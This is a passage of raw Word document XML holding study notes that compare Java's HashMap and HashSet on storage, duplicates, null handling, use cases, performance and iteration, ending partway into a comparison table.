          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not key-value pairs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE1843C" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is used when you need a collection of unique elements, and there is no need to associate a value with an element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9AD29B" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00060E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001060">
          <v:rect id="_x0000_i1562" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="618E51DC" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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Storage Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE73EB0" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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p>
    <w:p w14:paraId="615CB0A4" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ternally uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to store key-value pairs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF16117" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ch key is hashed using its hashCode(), and the value is stored at the hashed index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36267D35" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9E2986" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ternally uses a </w:t>
      </w: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to store the elements. It uses the set's elements as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the map, and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are always a constant object (commonly Boolean.TRUE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC00A0" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ssentially, HashSet is backed by a HashMap with values as dummy values (e.g., Boolean.TRUE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA0D935" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00060E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280E66D">
          <v:rect id="_x0000_i1563" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B9B35A" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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Key-Value vs. Single Element:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C224927" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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p>
    <w:p w14:paraId="7A5D459D" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ores both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>keys and values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Each key in the map must be unique, and each key maps to a specific value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6744A054" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC79FF0" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ores only </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Each element in the set must be unique, and it does not store any associated value (unlike a map).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4FA9D4" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00060E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614BC3E">
          <v:rect id="_x0000_i1564" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A331C95" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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Duplicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DC4F8E" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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p>
    <w:p w14:paraId="5FE4C2BE" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Does not allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>duplicate keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each key must be unique. However, it allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>duplicate values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>; the same value can be associated with different keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660FC9CA" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BD3143" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Does not allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>duplicate elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Any attempt to add a duplicate element is ignored, as it violates the uniqueness constraint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231799E1" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00060E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486456E">
          <v:rect id="_x0000_i1565" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B770B9A" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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Null Values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0104FC00" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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p>
    <w:p w14:paraId="37443270" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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llows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one null key</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multiple null values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. You can have a null key in the map and associate it with a value (even a null value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4FD37F" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67718826" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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llows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one null element</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the set. You can add a single null value, but only once since duplicates are not allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098111EB" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00060E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225B90">
          <v:rect id="_x0000_i1566" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37991E5E" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082EC642" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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p>
    <w:p w14:paraId="057877BF" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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deal when you need to store data where each element has a unique key, and you need to look up values based on those keys (e.g., a dictionary, cache, or database of key-value pairs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79967C7A" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3246F7" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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deal when you need a collection of unique elements without the need for key-value relationships. It is often used for operations like eliminating duplicates from a list, checking for uniqueness, or performing set operations like union and intersection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD921E9" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00060E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71F6B8C">
          <v:rect id="_x0000_i1567" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F6B99E" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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7. Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343BB14D" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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p>
    <w:p w14:paraId="710D94B6" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Provides constant time complexity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for get() and put() operations under normal circumstances (assuming a good hash function and load factor).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310EFDBC" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2728D344" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Also provides constant time complexity </w:t>
      </w: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for add(), remove(), and contains() operations, as it is backed by a HashMap where each element is stored as a key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D937E" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00060E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B6D913A">
          <v:rect id="_x0000_i1568" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29504708" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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8. Iteration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C1B3DC" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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p>
    <w:p w14:paraId="2D1DAA02" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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erates over </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key-value pairs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. You can iterate over the keys, values, or both.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660FD336" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08269936" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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erates over </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> only. Since it stores only values, iteration returns only the unique elements in the set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD050E2" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00060E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5696731">
          <v:rect id="_x0000_i1569" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BBC4A6" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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6"/>
        <w:gridCol w:w="3759"/>
        <w:gridCol w:w="4429"/>
      </w:tblGrid>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="13125D17" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B73BFE9" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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529642E8" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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ashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6991A275" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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ashSet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="500E9ECB" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4289F520" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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ata Structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="418DA830" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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ores </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>key-value pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="727A11ED" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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ores only </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="08993D7F" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BEEA896" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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nique Entries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DC67056" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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nique </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>keys</w:t>
